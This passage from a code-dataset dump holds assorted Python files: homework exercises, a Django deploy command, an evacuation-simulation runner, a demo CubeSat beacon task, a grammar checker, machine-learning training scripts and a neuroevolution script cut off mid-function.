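        container = tk.Frame(self)
        container.pack(fill='both', expand=True)
        container.grid_rowconfigure(0, weight=1)
        container.grid_columnconfigure(0, weight=1)
        self.frames = {}
        for name in ('start', 'main'):
            frame = tk.Frame(container)
            tk.Label(frame, text=name).pack()
            frame.grid(row=0, column=0, sticky='nsew')  # all share cell (0, 0)
            self.frames[name] = frame
        self.show('start')

    def show(self, name):
        self.frames[name].tkraise()   # bring the requested page to the front

# MiniApp().mainloop()  # needs a display; commented out for headless runs
```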
{"seq_id":"345175235","text":"# 1.\tWrite a program that swaps the keys and values of a dictionary.\nd={1:\"a\",2:\"b\"}\nd_new={}\nfor k,v in d.items():\n    # Way 1\n    # d_new[v]=k # when keys collide, the old value is overwritten\n\n    # Way 2\n    # d_new.setdefault(v,k) # when keys collide, the old value is NOT overwritten\n\n    # Way 3: update\n    t={v:k}\n    d_new.update(t) # when keys collide, the old value is overwritten\n\n# dict comprehension ----- builds a new dictionary\nprint({v:k for k,v in d.items()})\n\n\nprint(d_new)\n\n\n# 2.\tCan a tuple always be used as a dictionary key?\n# A tuple can be a dict key only when all of its elements are immutable objects\n# t=(1,2,[1])\n# x={t,\"aa\"}\n#\n# 3.\tRemove duplicate elements from a list\nli=[1,1,2,3,4,7,8,2,1,2]\nprint(li)\n\n# Way 1:\n# Start temp as an empty list, walk the original li, and append the elements that are not yet in temp.\ntemp=[]\nfor x in li:\n    if x not in temp:\n        temp.append(x)\nprint(temp)\n\n# Way 2:\n# Start temp as an empty list and walk the original li; for each element (index i),\n# check whether it also appears among the elements from i+1 to the end.\n# If it does, it is a duplicate (not unique), so skip it;\n# if it does not, it is unique, so append it to temp.\ntemp=[]\nfor index,i in enumerate(li):\n    if i not in li[index+1:]:\n        temp.append(i)\nprint(temp)\n\n# Way 3:\nprint(list(set(li)))\n\n#\n\n#\n# 4.\tGiven any two strings s1 and s2, count how many characters of s1 appear in s2\n# (duplicates count once; use a single statement)\ns1=\"aabbccddkk\"\ns2=\"adluglkdjkb\"\nprint(len(set(s1)&set(s2)))\n\n\n#\n# 5.\tImplement an HR employee-management program (employee id + name).\ndef que5():\n    info=\"\"\"Options: 1 hire, 2 dismiss, 3 modify, 4 list all employees, 5 look up an employee, 6 reset, 7 quit.\"\"\"\n    person={}\n    # If person already has employees, num takes the largest employee id, max(person);\n    # otherwise it starts at 1000000\n    # 1000001 Zhang San\n    # 1000002 Li Si\n    num=max(person) if person else 1000000\n    while True:\n        print(info)\n        c=input(\"Enter your choice: \")\n        if c==\"1\":\n            # id=input(\"Enter the employee id: \")\n            num += 1\n            if num in person:\n                print(\"employee id already exists\")\n                continue\n            name=input(\"Enter the employee name: \")\n            person[num]=name\n            print(\"added successfully!\")\n        elif c==\"2\":\n            id=int(input(\"Enter the id of the employee to dismiss: \"))\n            if id not in person:\n                print(\"employee does not exist\")\n                continue\n            person.pop(id)\n            print(\"deleted successfully!\")\n        elif c==\"3\":\n            id = int(input(\"Enter the id of the employee to modify: \"))\n            if id not in person:\n                print(\"employee does not exist\")\n                continue\n            name=input(\"the employee's new name: \")\n            person[id]=name\n            print(\"modified successfully\")\n        elif c==\"4\":\n            if person:\n                for k,v in person.items():\n                    print(k,v)\n            else:\n                print(\"no employee records yet\")\n        elif c==\"5\":\n            id = int(input(\"Enter the id of the employee to look up: \"))\n            if id not in person:\n                print(\"employee does not exist\")\n                continue\n            print(id,person[id])\n        elif c==\"6\":\n            person.clear()\n        elif c==\"7\":\n            break\n        else:\n            print(\"invalid input!\")\n\n\n\n#\n#\n#\n# 6.\tVerify the copy methods of sets and dictionaries.\n# dict.copy() is a shallow copy\n# For sets, whether the copy is deep or shallow, the copied object is no longer the original object.\nd={1:\"a\",2:\"b\",3:[\"d\",\"f\"]}\nd1=d.copy()\nimport copy\nd2=copy.copy(d)\nd3=copy.deepcopy(d)\nprint(id(d),id(d1),id(d2),id(d3))\nd[1]=\"a_new\"\nd[3][0]=\"d_new\"\nprint(d)\nprint(d1)\nprint(d2)\nprint(d3)\n\ns={1,2,3}\ns1=s.copy()\ns2=copy.copy(s)\ns3=copy.deepcopy(s)\nprint(id(s),id(s1),id(s2),id(s3))\n#\n#\n# 7.\tDescribe the usage and characteristics of tuple, list and dict in detail\n\"\"\"\ntuple: a fixed-length, immutable sequence container with very fast access; good for storing constants,\n      and often used as the parameters and return values of functions\nlist: a mutable container type with a rich set of methods.\ndict: key-value pairs; both values and length are mutable; good for storing mappings.\n# id:[name,age,gender]\n# log={id:[operation,id,name,time]} add/modify/delete.\n\n\"\"\"\n\n# 8.\tRemove letters that occur more than once in string a, keeping only the first occurrence.\n# e.g. 'abcabbd' becomes 'abcd' after removal\n# First turn the string into a list, then turn the list into a set (removes duplicates)\na=\"adkfjadkljfdlskfj\"\nli=list(a)\nprint(li)\nset_list=list(set(li))\nprint(set_list)\n\n# After deduplication, convert back to a list (so sort can be called); sets are unordered\n# Specify key: key is the index of each element in the original string.\n# key defines the sort rule: each element is passed to the key function, and the return values are used for sorting\nset_list.sort(key=a.index)\nprint(set_list)\n\n\n# 9.\tWithout a for loop, check whether the letters of string search all appear in string a.\na=\"DJLKDFJSKboyLFDJKdjkdfjsdk\"\nsearch=\"boy1\"\nprint(set(a))\nprint(set(search))\na_set=set(a)\nsearch_set=set(search)\na_set.update(search_set)\nprint(len(a_set)==len(set(a)))\n\nprint(a_set.issuperset(search_set))\n#\n","sub_path":"python1808real/day7/day6homework.py","file_name":"day6homework.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"351780948","text":"import os\n\nfrom ..utils import say, copy_template_to_file, get_project_name\nfrom ..utils.command import BaseCommand\n\n\nclass DeployCommand(BaseCommand):\n    def handle(self, params):\n        from rework import __version__\n        if params == ['--init']:\n            # template variables\n            project = get_project_name()\n            kwargs = {\n                'django_rework_version': __version__,\n                'project': project,\n            }\n            deploy_path = os.path.join(self.base_dir, 'deploy')\n\n            copy_queues = [\n                ('.deploy/nginx/project_prod.conf', deploy_path),\n                ('.deploy/nginx/project_test.conf', deploy_path),\n                ('.deploy/supervisor/supervisord.conf', deploy_path),\n                ('.deploy/supervisor/project_prod.conf', deploy_path),\n                ('.deploy/supervisor/project_test.conf', deploy_path),\n            ]\n            for q in copy_queues:\n                copy_template_to_file(q[0], self.base_dir, **kwargs)\n\n            say('Deploy files copied successfully')\n\n        else:\n            say('Unknown command args!')\n\n    def __call__(self, params):\n        return self.handle(params)\n","sub_path":"rework/core/management/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"227625210","text":"import os\nimport evacsim\n\n# Instantiates a new EvacSim object, and parses the given cmdline arguments (or uses default if left blank).\n# Models are then loaded from provided arguments or defaults, and exported accordingly to .KML files.\nev = evacsim.EvacSim()\nev.parse_args(ev.init_args())\nev.load_models()\nev.generate_evacuation_routes()\nev.export_kml()\n\n# If 'run' arg is true, open exported KML file in Google Earth Pro\nif ev.args['run']:\n    os.startfile('export.kml')\n\n# Example usage from the root directory:\n# python evacsim/run.py --nodes nodes.csv --edges edges.csv --disaster disaster.csv --dir models/troy_model/ --export export.kml\n# These arguments can be omitted to use the default values.\n","sub_path":"evacsim/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"144461757","text":"# Transmit \"Hello World\" beacon\n\nfrom Tasks.template_task import Task\nimport cdh\n\nANTENNA_ATTACHED = False\n\nclass task(Task):\n    priority = 1\n    frequency = 1/30 # once every 30s\n    name='beacon'\n    color = 'teal'\n\n    schedule_later = True\n\n    # our 4 byte code to authorize commands\n    # pass-code for DEMO PURPOSES ONLY\n    super_secret_code = b'p\\xba\\xb8C'\n\n    cmd_dispatch = {\n        'no-op': cdh.noop,\n        'hreset': cdh.hreset,\n        'shutdown': cdh.shutdown,\n        'query': cdh.query,\n        'exec_cmd': cdh.exec_cmd,\n    }\n\n    def __init__(self,satellite):\n        super().__init__(satellite)\n        # set our radiohead node ID so we can get ACKs\n        self.cubesat.radio1.node = 0xFA # our ID\n        self.cubesat.radio1.destination = 0xAB # target's ID\n\n    async def main_task(self):\n        \"\"\"\n        If you've attached a 433MHz antenna,\n        set the above ANTENNA_ATTACHED variable to True\n        to actually send the beacon packet\n        \"\"\"\n        if 
ANTENNA_ATTACHED:\n self.debug(\"Sending beacon\")\n self.cubesat.radio1.send(\"Hello World!\",destination=0xFF,keep_listening=True)\n else:\n # Fake beacon since we don't know if an antenna is attached\n print() # blank line\n self.debug(\"[WARNING]\")\n self.debug(\"NOT sending beacon (unknown antenna state)\",2)\n self.debug(\"If you've attached an antenna, edit '/Tasks/beacon_task.py' to actually beacon\", 2)\n print() # blank line\n self.cubesat.radio1.listen()\n\n self.debug(\"Listening 10s for response (non-blocking)\")\n heard_something = await self.cubesat.radio1.await_rx(timeout=10)\n\n if heard_something:\n # retrieve response but don't ACK back unless an antenna is attached\n response = self.cubesat.radio1.receive(keep_listening=True,with_ack=ANTENNA_ATTACHED)\n if response is not None:\n self.debug(\"packet received\")\n self.debug('msg: {}, RSSI: {}'.format(response,self.cubesat.radio1.last_rssi-137),2)\n self.cubesat.c_gs_resp+=1\n\n \"\"\"\n ########### ADVANCED ###########\n Over-the-air commands\n See beep-sat guide for more details\n \"\"\"\n if len(response) >= 6:\n if not ANTENNA_ATTACHED:\n self.debug('Antenna not attached. Skipping over-the-air command handling')\n else:\n if response[:4]==self.super_secret_code:\n cmd=bytes(response[4:6]) # [pass-code(4 bytes)] [cmd 2 bytes] [args]\n cmd_args=None\n if len(response) > 6:\n self.debug('command with args',2)\n try:\n cmd_args=response[6:] # arguments are everything after\n self.debug('cmd args: {}'.format(cmd_args),2)\n except Exception as e:\n self.debug('arg decoding error: {}'.format(e),2)\n if cmd in cdh.commands:\n try:\n if cmd_args is None:\n self.debug('running {} (no args)'.format(cdh.commands[cmd]))\n self.cmd_dispatch[cdh.commands[cmd]](self)\n else:\n self.debug('running {} (with args: {})'.format(cdh.commands[cmd],cmd_args))\n self.cmd_dispatch[cdh.commands[cmd]](self,cmd_args)\n except Exception as e:\n self.debug('something went wrong: {}'.format(e))\n self.cubesat.radio1.send(str(e).encode())\n else:\n self.debug('invalid command!')\n self.cubesat.radio1.send(b'invalid cmd'+response[4:])\n else:\n self.debug('no messages')\n self.cubesat.radio1.sleep()\n self.debug('finished')\n\n\n","sub_path":"advanced/Tasks/beacon_task.py","file_name":"beacon_task.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193313302","text":"import argparse\nfrom train import train\n#from evaluate import evaluate\nfrom validate import validate\n\ndef get_options():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\",\"--epochs\",type=int,dest=\"epochs\",help=\"number of epochs\",default=100)\n parser.add_argument(\"-lr\",type=float,dest=\"lr\",help=\"learning rate\",default=0.001)\n #parser.add_argument(\"-d\",\"--decay\",type=float,dest=\"decay\",help=\"weight decay\",default=0.005)\n #parser.add_argument(\"-m\",\"--momentum\",type=float,dest=\"momentum\",help=\"learning momentum\",default=0.9)\n parser.add_argument(\"-n\",\"--n_class\", type=int, dest=\"n_class\", help=\"number of segments\", default=1)\n parser.add_argument(\"-i\",\"--in_channel\", type=int, dest=\"in_channel\", help=\"number of input channels\", default=1)\n parser.add_argument(\"--display\", action = 'store_true')\n parser.add_argument(\"--save\", action = 'store_true')\n parser.add_argument(\"--save-file\", dest=\"save_file\", default=None)\n parser.add_argument(\"--load\", action = 'store_true')\n parser.add_argument(\"--load-file\", 
dest=\"load_file\", default=None)\n parser.add_argument(\"--eval\", action = 'store_true')\n parser.add_argument(\"--validate\", action = 'store_true')\n parser.add_argument(\"--directory\", dest=\"directory\", help=\"directory where training data is stored\", default='../Data/train/')\n parser.add_argument(\"--loss\", dest=\"loss\", help=\"choose loss function\", default='BCE')\n parser.add_argument(\"--image-size\", type=int, dest=\"img_size\", help=\"choose input image size\", default=None)\n parser.add_argument(\"--dataset-size\", type=int, dest=\"data_size\", help=\"number of images in an epoch\", default=None)\n args = parser.parse_args()\n if args.validate:\n validate(args.lr, args.n_class, args.in_channel, args.loss, args.display, directory=args.directory, img_size=args.img_size, data_size=args.data_size, load_file=args.load_file)\n else:\n train(args.epochs, args.lr, args.n_class, args.in_channel, args.loss, args.display, save=args.save, load=args.load, directory=args.directory, img_size=args.img_size, data_size=args.data_size, load_file=args.load_file, save_file=args.save_file)\n #if args.eval:\n # evaluate()\n #elif args.validate:\n # validate(args.display)\n #else:\n # train(args.epochs, args.lr, args.n_class, args.in_channel, args.display, save=args.save, load=args.load)\n\nget_options()\n","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648563516","text":"#!/usr/bin/python\n\nimport re\nimport logging\nfrom common import *\n\n\ndef check_line_for_unwanted_patterns(file_name, line, line_number):\n\n reg_exsps = [\n (\"pick up\",\"pick\", []),\n (\"which leads\",\"leads\", []),\n (\"are then\",\"are\", []),\n\n (\"[N|n]etwork state\",\"network's state\", []),\n (\"[N|n]etwork condit\",\"network's\", []),\n (\"[N|n]etwork utili\",\"network's\", []),\n\n\n\n # (\"network+[ ]+[\\w]+[ ]+state\",\"network's state\", []),\n\n (\"strong and weak\",\"advantages and disadvantages\", []),\n (\"one hand side\",\"one side\", []),\n (\"consider a \",\"considering\", []),\n (\"Consider a \",\"considering\", []),\n\n (\"[L|l]atency delay class \",\"latency class\", []),\n\n\n # (\"Consider a \",\"considering\", []),\n\n\n (\"not clear\",\"unclear\", []),\n (\"not sufficient\",\"insufficient\", []),\n (\"not necessary\",\"unnecessary\", []),\n (\"than it is\",\"than is\", []),\n (\"dependent on\",\"depends on\", []),\n\n (\"from a target\",\"of a target\", []),\n (\"from the target\",\"of the target\", []),\n (\"look into\",\"investigate\", []),\n (\"on Figure\",\"in Figure\", []),\n (\"at the times when\",\"when\", []),\n\n (\"significant\",\"perhaps large?\", []),\n\n (\"higher is the\",\"higher the\", []),\n (\"lower is the\",\"lower the\", []),\n (\"greater is the\",\"greater the\", []),\n (\"a lot of\",\"many\", []),\n (\"when exactly\",\"exactly when\", []),\n (\"can expect\",\"expect\", []),\n (\"has been defined\",\"defined\", []),\n (\"tells us\", \"states\", []),\n (\"erformance over\", \"performance on\", []),\n (\"[s] has\", \"have\", []),\n (\"real time\", \"real-time\", []),\n (\"[B|b]ack end\",\"back-end\", []),\n (\" [R|r]e[ |~|-]*eval\",\" \\mbox{re-evaluate} non separatable dash\", []),\n\n # (\" a [a-zA-Z]+[s]+[ \\.\\,;:]+\", \"Remove article?\", [\" a weakness \"]),\n # (\" a [a-zA-Z]+[ ]+[a-zA-Z]+[s]+[ \\.\\,;:]+\", \"Remove article?\", []),\n (\"this [\\w]+[s]+[^\\w]\", \"Use these?\", [\"this is \", \"this suggests \", \"this 
differs \", \"this was \"]),\n        # (\"significantly\", \"a lot ?\"),\n\n        # (\"[0-9]+[ ~]+hours\", \"x-hour\", []),\n        (\"[0-9]+[ ]+(ms|sec|min|hour|Hz)\", \"use ~ between number and a measurement\", []),\n\n        (\"[T|t]o be able to\", \"simply: to\", []),\n\n        (\"minimal\", \"minimum\", []),\n\n\n        # DASHED WORDS\n\n        (\"non intuitive\", \"non-intuitive\", []),\n        (\"[O|o]ne way\", \"one-way\", []),\n\n        # WORD ORDERING\n\n        (\" only used\", \"used only\", []),\n        (\" only with\", \"with only\", []),\n        (\"the only\", \"only the\", []),\n\n        # This as example demonstrates ==> As this example demonstrates\n        (\"this as\", \"as this\", []),\n\n        # Alternative Suggestions\n        (\"enough\", \"perhaps: sufficient/insufficient?\", []),\n        (\" pace\", \"perhaps: rate?\", []),\n        (\"[D|d]epend on\", \"perhaps: depend upon\", []),\n        (\"[D|d]epends on\", \"perhaps: depends upon\", []),\n\n\n\n\n        (\"axes\", \"axis?, ex: The X axis, Many axes\", []),\n\n\n        (\"[T|t]hen\", \"consider synonym: Subsequently\", []),\n\n        (\"[O|o]rder at which\", \"order IN which\", []),\n        (\"only from\", \"of only\", []),\n\n        (\"desire to provide\", \"perhaps: want to achieve ?\", []),\n\n        (\"[A|a]s a result\", \"perhaps: thus ?\", []),\n\n        (\"[W|w]ith accordance\", \"perhaps: in accordance ?\", []),\n        (\"accordance to\", \"perhaps: accordance with?\", []),\n\n        (\"[N|n]ot possible\", \"perhaps: impossible?\", []),\n\n\n        (\"[K|k]ernel level\", \"perhaps: kernel space?\", []),\n        (\"[U|u]ser level\", \"perhaps: user space?\", []),\n\n\n        (\"guarantee\", \"perhaps: ensure?\", []),\n\n        (\"[V|v]iew into\", \"perhaps: view of?\", []),\n\n        (\"Cassandra's requests\", \"Cassandra requests\", []),\n\n        (\"[A|a]pplication's requests\", \"application requests\", []),\n\n        (\"the interference\", \"interference\", []),\n\n        (\"performed frequently\", \"frequently performed\", []),\n\n        (\"improving the performance\", \"no _the_\", []),\n\n        (\"with regard to\", \"avoid, potentially: while taking advantage of....\", []),\n\n        (\"not able\", \"unable\", []),\n        (\"in the multiple\", \"multiples\", []),\n\n        (\"not active\", \"inactive\", []),\n\n        (\"according to\", \"as described in\", []),\n        (\"not practical\", \"impractical\", []),\n\n        (\"clients threads\", \"client threads\", []),\n\n        (\"need only\", \"only need\", []),\n\n\n\n\n\n    ]\n\n\n    for exp in reg_exsps:\n        p = re.compile(exp[0])\n        m = p.search(line)\n        if m and m.group() not in exp[2]:\n            left_index,_ = m.span()\n            print_warning(\n                file_name, line_number, line, m.group(),\n                left_index, message=\" (use: %s ?)\"%(exp[1])\n            )\n\n    ##########################################\n    # Complex Checks\n    ##########################################\n\n\n    p = re.compile(\" a [a-zA-Z]+[s]+[ \\.\\,;:]+\")\n    m = p.search(line)\n    if m:\n        left_index,_ = m.span()\n        word = fix_spaces(m.group()).split(\" \")[-1]\n        if word in NOUNS and is_plural(word):\n            print_warning(file_name, line_number, line, m.group(),\n                left_index, message=\" (use: Remove article?)\")\n        else:\n            logging.debug(\"Ignoring case: %s \" % (m.group()))\n\n    # Example: a large numbers\n    match, left_indx, _ = match_reg(line, \" a [a-zA-Z]+[ ]+[a-zA-Z]+[s]+[ \\.\\,;:]+\")\n    if match:\n        tokens = fix_spaces(match).split(\" \")\n        word = tokens[-1]\n        if word in NOUNS and is_plural(word):\n            print_warning(file_name, line_number, line, match,\n                left_indx, message=\" (use: Remove article(2)?)\")\n        else:\n            logging.debug(\"Ignoring case: %s \" % match)\n\n\n    # [x, y, and z] comma case, check x, y are nouns\n    p = re.compile(\"[a-zA-Z]+, [a-zA-Z]+ (and).\")\n    m = p.search(line)\n    if m:\n        substr = m.group()\n        substr = substr.replace(\",\", \"\")\n\n        word_x = substr.split(\" \")[0]\n        word_y = substr.split(\" \")[1]\n\n        if word_x in NOUNS and word_y in NOUNS:\n            left_index,_ = m.span()\n            print_warning(file_name, line_number, line, m.group(),\n                left_index, message=\" (use: x, y, and z?)\")\n        else:\n            logging.debug(\"Ignoring case: %s \" % (m.group()))","sub_path":"Phase_2/pytools-master/spycheck/checkgrammar.py","file_name":"checkgrammar.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"48488941","text":"#\n# @lc app=leetcode.cn id=127 lang=python3\n#\n# [127] Word Ladder\n#\n\n# @lc code=start\nimport collections\nfrom typing import List\n\n\nclass Solution:\n    def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n        LUT = collections.defaultdict(list)\n        L = len(endWord)\n        for word in wordList:\n            for i in range(L):\n                LUT[word[:i] + '*' + word[i + 1:]].append(word)\n        queue = collections.deque()\n        queue.append((beginWord, 1))\n\n        visited = set()\n        visited.add(beginWord)\n        while queue:\n            node, step = queue.popleft()\n            if node == endWord:\n                return step\n            for i in range(L):\n                new = node[:i] + '*' + node[i + 1:]\n                for word in LUT[new]:\n                    if word not in visited:\n                        visited.add(word)\n                        queue.append((word, step + 1))\n        return 0\n# @lc code=end\n\n","sub_path":"Week04/127.单词接龙.py","file_name":"127.单词接龙.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"613394575","text":"#!python3\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os, sys\nimport codecs\nimport glob\nimport json\nimport re\n\nINPUT_ENCODING = \"utf-8-sig\"\nOUTPUT_ENCODING = \"utf-8\"\n\ndef parse_text(text):\n    \"\"\"Scan the input file one line at a time, looking for a keyword\n    at the start of the line which will be one word in capital letters\n    followed by a colon. This introduces a text suite, possibly over several\n    lines which lasts until the next keyword or the end of the text.\n\n    Lines which start with a hash sign (#) are treated as comments\n    and are ignored.\n    \"\"\"\n    keyword_matcher = re.compile(r\"([A-Z]+)\\:\\s*(.*)\", flags=re.UNICODE)\n\n    #\n    # The text consists of a number of blocks, introduced by a keyword\n    # and containing one or more paragraphs. This parser yields the keyword\n    # and a list of the paragraphs. 
For some keywords, this list will always\n # contain exactly one string.\n #\n keyword = None\n paragraphs = []\n for line in text.splitlines():\n if line.startswith(\"#\"):\n continue\n match = keyword_matcher.match(line)\n if match:\n if keyword:\n yield keyword, paragraphs\n keyword, text = match.groups()\n paragraphs = [text.strip()]\n else:\n paragraphs.append(line.strip())\n\n #\n # If we fall out of the loop with a keyword & text\n # remaining (which is the most likely case) then yield\n # both\n #\n if keyword and paragraphs:\n yield keyword, paragraphs\n\ndef process_title(texts):\n \"\"\"Take a title with an optional subtitle in brackets and\n yield both as TITLE / SUBTITLE\n \"\"\"\n text = \" \".join(texts)\n #\n # Match as many non-left-bracket characters as possible\n # Then, optionally, match text in brackets\n #\n title, subtitle = re.match(r\"([^(]+)\\s*(?:\\(([^)]+)\\))?\", text, flags=re.UNICODE).groups()\n yield \"TITLE\", title\n yield \"SUBTITLE\", subtitle\n\ndef process_gospel(texts):\n \"\"\"Take a gospel quote prefixed by a chapter-and-verse reference.\n NB The chapter-and-verse must be on the same line as the \"GOSPEL:\"\n tag but the quote must be on a new line -- this makes it easier\n (read: possible) to parse the messy citations you can get.\n \"\"\"\n text = \"%s\\n%s\" % (texts[0], \" \".join(texts[1:]))\n citation, gospel = re.match(r\"([^\\n]+)\\n(.*)\", text, flags=re.UNICODE).groups()\n yield \"CITATION\", citation\n yield \"GOSPEL\", gospel\n\nstyle_markers = {\n \"_\" : \"italic\",\n \"*\" : \"bold\",\n \"@\" : \"boldItalic\"\n}\ndef process_paragraph(paragraph):\n \"\"\"Generate tuples of (style, text) where the default\n style is normal, and an underscore introduces an italic style\n and an asterisk introduces a bold style.\n \"\"\"\n state = \"normal\"\n text = \"\"\n for c in paragraph:\n for marker, style in style_markers.items():\n if c == marker:\n if text:\n yield state, text\n text = \"\"\n state = \"normal\" if state == style else style\n break\n else:\n text += c\n\n if text:\n yield state, text\n\ndef process_comments(texts):\n \"\"\"The comments field is processed specially so that blocks which are\n tagged as italic or bold (surrounded by _ or *) can be broken out into\n separate blocks and tagged as such.\n \"\"\"\n comments = []\n for paragraph in texts:\n comment = list(process_paragraph(paragraph))\n if comment:\n comments.append(comment)\n yield \"COMMENTS\", comments\n\n\ndef break_and_process_comments(text):\n paragraphs = []\n for line in text.splitlines():\n comment = list(process_paragraph(line.strip()))\n if comment:\n paragraphs.append(comment)\n return paragraphs\n\n#\n# Each processor takes a list of paragraphs and yields\n# tuples of keyword, paragraphs. This allows a single source\n# line to become more than one keyword / text. 
eg a title\n# which looks like this:\n# TITLE: This is a title (With a subtitle)\n# can yield:\n# TITLE, This is a title\n# SUBTITLE, With a subtitle\n#\nPROCESSORS = {\n    \"TITLE\" : process_title,\n    \"GOSPEL\" : process_gospel,\n    \"COMMENTS\" : process_comments\n}\n\ndef process_one_file(filepath):\n    items = {}\n    with codecs.open(filepath, encoding=INPUT_ENCODING) as f:\n        for keyword, paragraphs in parse_text(str(f.read())):\n            items.update(PROCESSORS[keyword](paragraphs))\n    return items\n\ndef process_one_folder(dirpath, include_subfolders=True):\n    text = {}\n    if include_subfolders:\n        filepaths = []\n        for dirname, dirnames, filenames in os.walk(dirpath):\n            for filename in filenames:\n                if filename.endswith(\".txt\"):\n                    filepaths.append(os.path.join(dirname, filename))\n    else:\n        filepaths = glob.glob(os.path.join(dirpath, \"*.txt\"))\n    \n    for filepath in sorted(filepaths):\n        print(filepath)\n        filename = os.path.basename(filepath)\n        name, ext = os.path.splitext(filename)\n        text[name] = dict(process_one_file(filepath))\n    return text\n\ndef process_one_thing(path):\n    if os.path.isdir(path):\n        return process_one_folder(path)\n    else:\n        print(path)\n        return process_one_file(path)\n\nif __name__ == '__main__':\n    import pprint\n    with codecs.open(\"parse.txt\", \"wb\", encoding=INPUT_ENCODING) as f:\n        f.write(\"# -*- coding: utf-8 -*-\\n\")\n        pprint.pprint(process_one_thing(*sys.argv[1:]), f)\n        #~ json.dump(process_one_folder(*sys.argv[1:]), f)\n","sub_path":"src/build/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"10943479","text":"import pandas as pd\n\nfilename = 'bankloan.xls' # input data\ndata = pd.read_excel(filename)\nx = data.iloc[:,:8].as_matrix()\nprint(x) # convert columns x0..x7 into a numpy array\ny = data.iloc[:,8].as_matrix()\nprint(y) # convert column 8 into a numpy array\n\n\nfrom sklearn.linear_model import RandomizedLogisticRegression as RLR\n\n'''\nrlr = RLR()\nrlr.fit(x, y) \nrlr.get_support()\n\n\nprint(u'')\nprint(u'' % ','.join(data.columns[rlr.get_support()]))\nx = data[data.columns[rlr.get_support()]].as_matrix() \n\nlr = LR() \nlr.fit(x, y) \nprint(u'')\nprint(u'' % lr.score(x, y)) \n'''","sub_path":"第五章 挖掘建模/1,分类与预测/logistic模型的建立.py","file_name":"logistic模型的建立.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"407547750","text":"\n\nimport time\nimport numpy as np\nfrom multiprocessing.dummy import Pool\n\n\ndef run(name):\n    a = np.random.randint(0, 10)\n    print('Process {} running, this needs {} seconds '.format(name, a))\n    time.sleep(a)\n    print('Process {} finished running, the return value is {}'.format(name, a))\n    return (a)\n\n\nif __name__ == '__main__':\n    p = Pool(4)\n    res = []\n    for i in range(8):\n        res_temp = p.apply_async(run, args=(i,))\n        res.append(res_temp)\n    p.close()\n    p.join()\n    print('main thread')\n    for res_temp in res:\n        print(res_temp.get())\n","sub_path":"_book/code/Python基础/多进程.py","file_name":"多进程.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"161036608","text":"locate = lambda x, n: x + (4 * n - 4) - 1  # locate the leftmost, topmost value in the n*n matrix\r\ncalculate_sum = lambda x, n: sum(range(x, x - 3 * (n - 1) - 1, - (n - 1)))  # calculate the sum of the four corners of the n*n matrix\r\nx0 = 2\r\ns = 1\r\nn = 1001\r\nfor k in range(3, n + 1, 2):\r\n    x1 = locate(x0, k)\r\n    s += 
calculate_sum(x1, k)\r\n    x0 = x1 + 1\r\nprint(s)","sub_path":"question28.py","file_name":"question28.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"253780729","text":"#!/usr/bin/python\n\n\"\"\"\nAuthor: Shashank Kotyan\nEmail: shashankkotyan@gmail.com\n\"\"\"\n\nimport os, sys, warnings\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nwarnings.filterwarnings('ignore')\n\nimport argparse, glob, pickle, time, GPUtil, numpy as np \n\nfrom scipy.cluster.vq import whiten as normalise\nfrom multiprocessing.managers import BaseManager\n\nimport build\nfrom population import Population\nfrom worker import Worker\nfrom process import Process\n\n\nclass NeuroEvolution:\n\n\n    def __init__(self, args):\n        \n        self.population_size = args.population_size\n        self.population_dir = args.population_dir\n        self.num_mutations = args.num_mutations\n        self.number_of_child = args.num_mutated_child\n        \n        self.gen = -1\n        self.ind_counter = 0\n\n        if not os.path.exists(self.population_dir): os.makedirs(self.population_dir)\n        if not os.path.exists(args.log_dir): os.makedirs(args.log_dir)\n\n        BaseManager.register('Population', Population)\n        manager = BaseManager()\n        manager.start()\n        \n        self.population = manager.Population()\n        self.population.set(args)\n        \n        self.worker = Worker(args, build.load_data(args.dataset))\n\n    \n    def parallel_run(self, type_create, args):\n\n        start = False\n\n        while not start:\n\n            for deviceID in range(7):\n\n                if deviceID in self.jobs:\n\n                    if not self.jobs[deviceID].is_alive():\n\n                        self.jobs[deviceID].close() \n                        if self.jobs[deviceID].exception is not None: raise Exception(f\"{self.jobs[deviceID].exception[0]}, {self.jobs[deviceID].exception[1]}\")\n                        finished_job = self.jobs.pop(deviceID, None)\n\n            with open(\"num_workers.txt\", \"r\") as f: num_workers = int(f.read())\n\n            deviceIDs = GPUtil.getAvailable(order='memory', limit=7, maxLoad=1.1, maxMemory=0.5)\n\n            alive = -1\n\n            if len(deviceIDs) != 0:\n\n                for deviceID in deviceIDs:\n\n                    if deviceID not in self.jobs:\n\n                        alive = deviceID\n                        break\n\n            if len(self.jobs) < num_workers and alive > -1:\n\n                print(f\"GPU {alive} running {self.ind_counter}\")\n\n                if type_create == 0: 